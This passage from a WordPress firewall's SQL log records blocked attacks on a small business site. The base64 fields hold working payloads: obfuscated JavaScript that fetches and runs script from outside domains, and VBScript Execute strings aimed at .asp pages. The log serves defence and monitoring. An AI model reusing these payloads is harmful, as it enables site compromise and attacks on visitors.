X2FhYWFhYWFhYSovLDExMS8qKi8sOTkvKl9hYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWEqLywxMTQvKl9hYWFhYWFhYWEqLyw0Ni8qX2FhYWFhYWFhYSovLDEwNi8qX2FhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYSovLDYzKTt2YXIgX2FhYWFhYWFhYSA9IF9hYWFhYWFhYWEoX2FhYWFhYWFhYSk7aWYoX2FhYWFhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhYWFhKF9hYWFhYWFhYWEpO30gZnVuY3Rpb24gX2FhYWFhYWFhYShfYWFhYWFhYWFhKXsgdmFyIF9hYWFhYWFhYWEgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtfYWFhYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhYWFhLCBmYWxzZSApO19hYWFhYWFhYWEuc2VuZCggbnVsbCApO3JldHVybiBfYWFhYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYWFhYSh0b2RvKXsgdmFyIF9hYWFhYWFhYWEgPSBuZXcgRnVuY3Rpb24oJ3gnLCAneScsIHRvZG8rJyByZXR1cm4geCt5OycpO19hYWFhYWFhYWEoMCwwKTt9PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37798,1569949622.576769,1569949621.058200,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?Action=EWD_UFAQ_UpdateOptions',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWE9U3RyaW5nLmZyb21DaGFyQ29kZSgxMDQvKl9hYWFhYWEqLywxMTYvKl9hYWFhYWEqLywxMTYvKl9hYWFhYWEqLywxMTIvKiovLDExNS8qX2FhYWFhYSovLDU4LypfYWFhYWFhKi8sNDcvKl9hYWFhYWEqLyw0Ny8qX2FhYWFhYSovLDEwMy8qX2FhYWFhYSovLDEwOC8qX2FhYWFhYSovLDk3LypfYWFhYWFhKi8sMTE1LypfYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYSovLDk4LyoqLywxMDEvKl9hYWFhYWEqLywxMDgvKl9hYWFhYWEqLyw5Ny8qX2FhYWFhYSovLDExNi8qX2FhYWFhYSovLDEwMS8qX2FhYWFhYSovLDExNC8qX2FhYWFhYSovLDk4LypfYWFhYWFhKi8sMTAxLypfYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYSovLDExNS8qX2FhYWFhYSovLDExNi8qX2FhYWFhYSovLDEwNC8qX2FhYWFhYSovLDEwMS8qKi8sMTE0LypfYWFhYWFhKi8sMTAxLypfYWFhYWFhKi8sNDYvKl9hYWFhYWEqLyw5OS8qX2FhYWFhYSovLDExMS8qKi8sMTA5LypfYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYSovLDExMS8qKi8sOTkvKl9hYWFhYWEqLyw5Ny8qX2FhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhKi8sMTA4LypfYWFhYWFhKi8sMTAxLypfYWFhYWFhKi8sOTcvKl9hYWFhYWEqLywxMTQvKl9hYWFhYWEqLyw0Ni8qX2FhYWFhYSovLDEwNi8qX2FhYWFhYSovLDExNS8qX2FhYWFhYSovLDYzKTt2YXIgX2FhYWFhYSA9IF9hYWFhYWEoX2FhYWFhYSk7aWYoX2FhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhKF9hYWFhYWEpO30gZnVuY3Rpb24gX2FhYWFhYShfYWFhYWFhKXsgdmFyIF9hYWFhYWEgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtfYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhLCBmYWxzZSApO19hYWFhYWEuc2VuZCggbnVsbCApO3JldHVybiBfYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYSh0b2RvKXsgdmFyIF9hYWFhYWEgPSBuZXcgRnVuY3Rpb24oJ3gnLCAneScsIHRvZG8rJyByZXR1cm4geCt5OycpO19hYWFhYWEoMCwwKTt9PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37659,1569411542.547416,1569411527.548100,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP Live Chat Support <= 8.0.28 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"147\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37799,1569949613.597973,1569949612.138500,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"145\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWFhYWE9U3RyaW5nLmZyb21DaGFyQ29kZSgxMDQvKl9hYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWEqLywxMTIvKiovLDExNS8qX2FhYWFhYWFhYSovLDU4LypfYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWEqLyw0Ny8qX2FhYWFhYWFhYSovLDEwMy8qX2FhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYSovLDk3LypfYWFhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYWFhYSovLDk4LyoqLywxMDEvKl9hYWFhYWFhYWEqLywxMDgvKl9hYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhYSovLDk4LypfYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYSovLDEwNC8qX2FhYWFhYWFhYSovLDEwMS8qKi8sMTE0LypfYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYWEqLyw5OS8qX2FhYWFhYWFhYSovLDExMS8qKi8sMTA5LypfYWFhYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYWFhYSovLDExMS8qKi8sOTkvKl9hYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWEqLywxMTQvKl9hYWFhYWFhYWEqLyw0Ni8qX2FhYWFhYWFhYSovLDEwNi8qX2FhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYSovLDYzKTt2YXIgX2FhYWFhYWFhYSA9IF9hYWFhYWFhYWEoX2FhYWFhYWFhYSk7aWYoX2FhYWFhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhYWFhKF9hYWFhYWFhYWEpO30gZnVuY3Rpb24gX2FhYWFhYWFhYShfYWFhYWFhYWFhKXsgdmFyIF9hYWFhYWFhYWEgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtfYWFhYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhYWFhLCBmYWxzZSApO19hYWFhYWFhYWEuc2VuZCggbnVsbCApO3JldHVybiBfYWFhYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYWFhYSh0b2RvKXsgdmFyIF9hYWFhYWFhYWEgPSBuZXcgRnVuY3Rpb24oJ3gnLCAneScsIHRvZG8rJyByZXR1cm4geCt5OycpO19hYWFhYWFhYWEoMCwwKTt9PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37673,1569411757.971955,1569411757.137000,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=3',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mw==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37607,1569410844.962853,1569410843.136000,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP Live Chat Support <= 8.0.28 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"147\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37942,1571333152.199195,1571333151.076400,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2VtYWlsXQ==\",\"paramValue\":\"PHN2Zy9vbmxvYWQ9ZXZhbChTdHJpbmcuZnJvbUNoYXJDb2RlKDMyLDQwLDEwMiwxMTcsMTEwLDk5LDExNiwxMDUsMTExLDExMCw0MCw0MSwzMiwxMjMsMTAsMzIsMzIsMzIsMzIsMTE4LDk3LDExNCwzMiwxMDEsMTA4LDEwMSwxMDksMzIsNjEsMzIsMTAwLDExMSw5OSwxMTcsMTA5LDEwMSwxMTAsMTE2LDQ2LDk5LDExNCwxMDEsOTcsMTE2LDEwMSw2OSwxMDgsMTAxLDEwOSwxMDEsMTEwLDExNiw0MCwzOSwxMTUsOTksMTE0LDEwNSwxMTIsMTE2LDM5LDQxLDU5LDMyLDEwLDksMTAxLDEwOCwxMDEsMTA5LDQ2LDExNiwxMjEsMTEyLDEwMSwzMiw2MSwzMiwzOSwxMTYsMTAxLDEyMCwxMTYsNDcsMTA2LDk3LDExOCw5NywxMTUsOTksMTE0LDEwNSwxMTIsMTE2LDM5LDU5LDMyLDEwLDMyLDMyLDMyLDMyLDEwMSwxMDgsMTAxLDEwOSw0NiwxMTUsMTE0LDk5LDMyLDYxLDMyLDM5LDEwNCwxMTYsMTE2LDExMiwxMTUsNTgsNDcsNDcsOTksMTAwLDQ2LDExMiwxMTQsMTA1LDExOCw5Nyw5OSwxMjEsMTA4LDExMSw5OSw5NywxMTYsMTA1LDExMSwxMTAsMTAyLDExMSwxMTQsMTA4LDExMSw5OSw0Niw5OSwxMTEsMTA5LDQ3LDk5LDExMSwxMTQsMTEwLDQ3LDEwMiwxMDgsMTAxLDEyMCw0NiwxMDYsMTE1LDYzLDExNiwxMTIsNjEsNTIsMzksNTksMTAsMzIsMzIsMzIsMzIsMTAwLDExMSw5OSwxMTcsMTA5LDEwMSwxMTAsMTE2LDQ2LDEwMywxMDEsMTE2LDY5LDEwOCwxMDEsMTA5LDEwMSwxMTAsMTE2LDExNSw2NiwxMjEsODQsOTcsMTAzLDc4LDk3LDEwOSwxMDEsNDAsMzQsMTA0LDEwMSw5NywxMDAsMzQsNDEsOTEsNDgsOTMsNDYsOTcsMTEyLDExMiwxMDEsMTEwLDEwMCw2NywxMDQsMTA1LDEwOCwxMDAsNDAsMTAxLDEwOCwxMDEsMTA5LDQxLDU5LDEwLDMyLDMyLDEyNSw0MSw0MCw0MSw1OSkpOz5AdGVzdC5jb20=\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37941,1571333109.636726,1571333108.804300,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php?page=wppcp-security-settings-page',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP Private Content Plus <= 1.31 Unauthenticated Options Update','{\"learningMode\":0,\"failedRules\":\"161\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3dwcGNwX3RhYl0=\",\"paramValue\":\"d3BwY3Bfc2VjdGlvbl9zZWN1cml0eV9pcA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"auth-bypass\",\"ssl\":1}'),(37995,1571334739.679621,1571334738.536900,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?page=wpsm_responsive_coming_soon',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3Jjc3BfZGVzY3JpcHRpb25d\",\"paramValue\":\"PHNjcmlwdCAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF8zaWQwNzl2c2Fzd3ZpamxzeD1TdHJpbmcuZnJvbUNoYXJDb2RlKDEwNC8qXzN5d283NDhhaXd3bmt4d2s0Ki8sMTE2LyoqLywxMTYvKl8yY25oMG03OXQ1czE4aWptMiovLDExMi8qXzRvcnJwazVpNWxzeWozZDdwKi8sMTE1LypfMmNuaDBtNzl0NXMxOGlqbTIqLyw1OC8qXzN5d283NDhhaXd3bmt4d2s0Ki8sNDcvKl80b3JycGs1aTVsc3lqM2Q3cCovLDQ3LypfM3l3bzc0OGFpd3dua3h3azQqLyw5OS8qXzNpZDA3OXZzYXN3dmlqbHN4Ki8sMTAwLypfMmNuaDBtNzl0NXMxOGlqbTIqLyw0Ni8qXzRvcnJwazVpNWxzeWozZDdwKi8sMTEyLypfM2lkMDc5dnNhc3d2aWpsc3gqLywxMTQvKl8yY25oMG03OXQ1czE4aWptMiovLDEwNS8qXzN5d283NDhhaXd3bmt4d2s0Ki8sMTE4LypfM3l3bzc0OGFpd3dua3h3azQqLyw5Ny8qXzNpZDA3OXZzYXN3dmlqbHN4Ki8sOTkvKiovLDEyMS8qXzJjbmgwbTc5dDVzMThpam0yKi8sMTA4LyoqLywxMTEvKiovLDk5LypfM3l3bzc0OGFpd3dua3h3azQqLyw5Ny8qXzJjbmgwbTc5dDVzMThpam0yKi8sMTE2LyoqLywxMDUvKl8zaWQwNzl2c2Fzd3ZpamxzeCovLDExMS8qXzRvcnJwazVpNWxzeWozZDdwKi8sMTEwLypfM3l3bzc0OGFpd3dua3h3azQqLywxMDIvKl8yY25oMG03OXQ1czE4aWptMiovLDExMS8qXzNpZDA3OXZzYXN3dmlqbHN4Ki8sMTE0LypfNG9ycnBrNWk1bHN5ajNkN3AqLywxMDgvKl8zeXdvNzQ4YWl3d25reHdrNCovLDExMS8qXzN5d283NDhhaXd3bmt4d2s0Ki8sOTkvKiovLDQ2LyoqLyw5OS8qKi8sMTExLyoqLywxMDkvKl8zaWQwNzl2c2Fzd3ZpamxzeCovLDQ3LypfM2lkMDc5dnNhc3d2aWpsc3gqLywxMTYvKl80b3JycGs1aTVsc3lqM2Q3cCovLDk3LyoqLywxMTIvKiovLDExMi8qXzNpZDA3OXZzYXN3dmlqbHN4Ki8sMTAxLypfNG9ycnBrNWk1bHN5ajNkN3AqLywxMTQvKl80b3JycGs1aTVsc3lqM2Q3cCovLDQ2LypfM2lkMDc5dnNhc3d2aWpsc3gqLywxMDYvKl8yY25oMG03OXQ1czE4aWptMiovLDExNS8qXzJjbmgwbTc5dDVzMThpam0yKi8sNjMvKl8zaWQwNzl2c2Fzd3ZpamxzeCovLDEwOS8qKi8sNjEvKiovLDEwOS8qXzRvcnJwazVpNWxzeWozZDdwKi8pO3ZhciBfNG9ycnBrNWk1bHN5ajNkN3AgPSBfMmNuaDBtNzl0NXMxOGlqbTIoXzNpZDA3OXZzYXN3dmlqbHN4KTtpZihfNG9ycnBrNWk1bHN5ajNkN3AubGVuZ3RoID4gMyl7X2l5bTEyd2VuOW92N2VjOXU1KF80b3JycGs1aTVsc3lqM2Q3cCk7fSBmdW5jdGlvbiBfMmNuaDBtNzl0NXMxOGlqbTIoX2Jtb3BrbG4yeGJpZHlpbHp0KXsgdmFyIF8zeXdvNzQ4YWl3d25reHdrNCA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO18zeXdvNzQ4YWl3d25reHdrNC5vcGVuKCBTdHJpbmcuZnJvbUNoYXJDb2RlKDcxLDY5LDg0KSwgX2Jtb3BrbG4yeGJpZHlpbHp0LCBmYWxzZSApO18zeXdvNzQ4YWl3d25reHdrNC5zZW5kKCBudWxsICk7cmV0dXJuIF8zeXdvNzQ4YWl3d25reHdrNC5yZXNwb25zZVRleHQ7fWZ1bmN0aW9uIF9peW0xMndlbjlvdjdlYzl1NShfNWV4NHFrcTZ4azhnMmdxMmUpeyB2YXIgX3hqdmN6dGZjcDZscnJiY2dlID0gbmV3IEZ1bmN0aW9uKCd4JywgJ3knLCBfNWV4NHFrcTZ4azhnMmdxMmUrJyByZXR1cm4geCt5OycpO194anZjenRmY3A2bHJyYmNnZSgwLDApO308L3NjcmlwdD4=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37880,1570544471.485642,1570544470.606300,'\0\0\0\0\0\0\0\0\0\0ÿÿw»äÎ',0,403,0,0,0,'http://bintara.com.my//admin/sdfg.asp','https://www.baidu.com','Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2Fd\",\"paramValue\":\"RXhlY3V0ZSgiRXhlY3V0ZSgiIk9uIEVycm9yIFJlc3VtZSBOZXh0OlJlc3BvbnNlLkNsZWFyOkZ1bmN0aW9uIGJkKGJ5VmFsIHMpOkZvciBpPTEgVG8gTGVuKHMpIFN0ZXAgMjpjPU1pZChzLGksMik6SWYgSXNOdW1lcmljKE1pZChzLGksMSkpIFRoZW46RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyYiIiIiKSIiIiIpOkVsc2U6RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyZNaWQocyxpKzIsMikmIiIiIikiIiIiKTppPWkrMjpFbmQgSWYiIiZjaHIlKDEwKSYiIk5leHQ6RW5kIEZ1bmN0aW9uOlJlc3BvbnNlLldyaXRlKCIiIiItPnwiIiIiKTpFeGVjdXRlKCIiIiJPbiBFcnJvciBSZXN1bWUgTmV4dDoiIiIiJmJkKCIiIiI0NDY5NkQyMDUzM0E1MzNENTM2NTcyNzY2NTcyMkU0RDYxNzA3MDYxNzQ2ODI4MjIyRTIyMjkyNjYzNjg3MjI4MzkyOTNBNTM0NTU0MjA0MzNENDM3MjY1NjE3NDY1NEY2MjZBNjU2Mzc0MjgyMjUzNjM3MjY5NzA3NDY5NkU2NzJFNDY2OTZDNjU1Mzc5NzM3NDY1NkQ0RjYyNkE2NTYzNzQyMjI5M0E0OTY2MjA0NTcyNzIyMDU0Njg2NTZFM0E0NTcyNzIyRTQzNkM2NTYxNzIzQTQ1NkM3MzY1M0E0NjZGNzIyMDQ1NjE2MzY4MjA0NDIwNjk2RTIwNDMyRTQ0NzI2OTc2NjU3MzNBNTMzRDUzMjY0NDJFNDQ3MjY5NzY2NTRDNjU3NDc0NjU3MjI2NjM2ODcyMjgzNTM4MjkzQTRFNjU3ODc0M0E0NTZFNjQyMDQ5NjYzQTUyNjU3MzcwNkY2RTczNjUyRTU3NzI2OTc0NjUyODUzMjkiIiIiKSk6UmVzcG9uc2UuV3JpdGUoIiIiInw8LSIiIiIpOlJlc3BvbnNlLkVuZCIiKSIp\",\"path\":\"Ly9hZG1pbi9zZGZnLmFzcA==\",\"category\":\"sqli\",\"ssl\":0}'),(37928,1570818071.988172,1570818071.194200,'\0\0\0\0\0\0\0\0\0\0ÿÿÀc',0,403,0,0,0,'http://bintara.com.my/?up_auto_log=true',NULL,'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0','blocked:waf','UserPro - User Profiles with Social Login <= 4.9.17 - Authentication Bypass','{\"learningMode\":0,\"failedRules\":\"106\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cF9hdXRvX2xvZ10=\",\"paramValue\":\"dHJ1ZQ==\",\"path\":\"Lw==\",\"category\":\"auth-bypass\",\"ssl\":0}'),(37762,1569949554.803412,1569949553.748400,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Newspaper Premium Theme <= 6.7.1 - Privilege Escalation','{\"learningMode\":0,\"failedRules\":\"91\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"auth-bypass\",\"ssl\":1}'),(37899,1570544743.237898,1570544741.954900,'\0\0\0\0\0\0\0\0\0\0ÿÿw»äÎ',0,403,0,0,0,'http://bintara.com.my//kdatebase/index_.asp','https://www.baidu.com','Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5ib2R5W0NuZTEyM10=\",\"paramValue\":\"RXhlY3V0ZSgiRXhlY3V0ZSgiIk9uIEVycm9yIFJlc3VtZSBOZXh0OlJlc3BvbnNlLkNsZWFyOkZ1bmN0aW9uIGJkKGJ5VmFsIHMpOkZvciBpPTEgVG8gTGVuKHMpIFN0ZXAgMjpjPU1pZChzLGksMik6SWYgSXNOdW1lcmljKE1pZChzLGksMSkpIFRoZW46RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyYiIiIiKSIiIiIpOkVsc2U6RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyZNaWQocyxpKzIsMikmIiIiIikiIiIiKTppPWkrMjpFbmQgSWYiIiZjaHIlKDEwKSYiIk5leHQ6RW5kIEZ1bmN0aW9uOlJlc3BvbnNlLldyaXRlKCIiIiItPnwiIiIiKTpFeGVjdXRlKCIiIiJPbiBFcnJvciBSZXN1bWUgTmV4dDoiIiIiJmJkKCIiIiI0NDY5NkQyMDUzM0E1MzNENTM2NTcyNzY2NTcyMkU0RDYxNzA3MDYxNzQ2ODI4MjIyRTIyMjkyNjYzNjg3MjI4MzkyOTNBNTM0NTU0MjA0MzNENDM3MjY1NjE3NDY1NEY2MjZBNjU2Mzc0MjgyMjUzNjM3MjY5NzA3NDY5NkU2NzJFNDY2OTZDNjU1Mzc5NzM3NDY1NkQ0RjYyNkE2NTYzNzQyMjI5M0E0OTY2MjA0NTcyNzIyMDU0Njg2NTZFM0E0NTcyNzIyRTQzNkM2NTYxNzIzQTQ1NkM3MzY1M0E0NjZGNzIyMDQ1NjE2MzY4MjA0NDIwNjk2RTIwNDMyRTQ0NzI2OTc2NjU3MzNBNTMzRDUzMjY0NDJFNDQ3MjY5NzY2NTRDNjU3NDc0NjU3MjI2NjM2ODcyMjgzNTM4MjkzQTRFNjU3ODc0M0E0NTZFNjQyMDQ5NjYzQTUyNjU3MzcwNkY2RTczNjUyRTU3NzI2OTc0NjUyODUzMjkiIiIiKSk6UmVzcG9uc2UuV3JpdGUoIiIiInw8LSIiIiIpOlJlc3BvbnNlLkVuZCIiKSIp\",\"path\":\"Ly9rZGF0ZWJhc2UvaW5kZXhfLmFzcA==\",\"category\":\"sqli\",\"ssl\":0}'),(37703,1569411848.907127,1569411848.004300,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php','livechat_settings','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2xpY2Vuc2VFbWFpbF0=\",\"paramValue\":\"Ij48c2NyaXB0ICB0eXBlPXRleHQvamF2YXNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PnZhciBjID0gMDt2YXIgX2FhYWFhYWFhYWFhYWFhYWE9U3RyaW5nLmZyb21DaGFyQ29kZSgxMDQvKl9hYWFhYWFhYWFhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWFhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYWFhYWFhYWEqLywxMTIvKiovLDExNS8qX2FhYWFhYWFhYWFhYWFhYWEqLyw1OC8qX2FhYWFhYWFhYWFhYWFhYWEqLyw0Ny8qX2FhYWFhYWFhYWFhYWFhYWEqLyw0Ny8qX2FhYWFhYWFhYWFhYWFhYWEqLywxMDMvKl9hYWFhYWFhYWFhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWFhYWFhYWFhYSovLDk3LypfYWFhYWFhYWFhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYWFhYWFhYWEqLywxMTUvKiovLDQ2LypfYWFhYWFhYWFhYWFhYWFhYSovLDk4LyoqLywxMDEvKl9hYWFhYWFhYWFhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWFhYWFhYWFhYSovLDk3LypfYWFhYWFhYWFhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhYWFhYWFhKi8sMTE0LypfYWFhYWFhYWFhYWFhYWFhYSovLDk4LypfYWFhYWFhYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWFhYWFhYWEqLywxMTkvKiovLDk3LypfYWFhYWFhYWFhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYWFhYWFhKi8sMTA0LypfYWFhYWFhYWFhYWFhYWFhYSovLDEwMS8qKi8sMTE0LypfYWFhYWFhYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWFhYWFhYWEqLyw0Ni8qX2FhYWFhYWFhYWFhYWFhYWEqLyw5OS8qX2FhYWFhYWFhYWFhYWFhYWEqLywxMTEvKiovLDEwOS8qX2FhYWFhYWFhYWFhYWFhYWEqLyw0Ny8qKi8sMTA4LypfYWFhYWFhYWFhYWFhYWFhYSovLDExMS8qKi8sOTkvKl9hYWFhYWFhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYWFhYWFhKi8sMTA4Lyo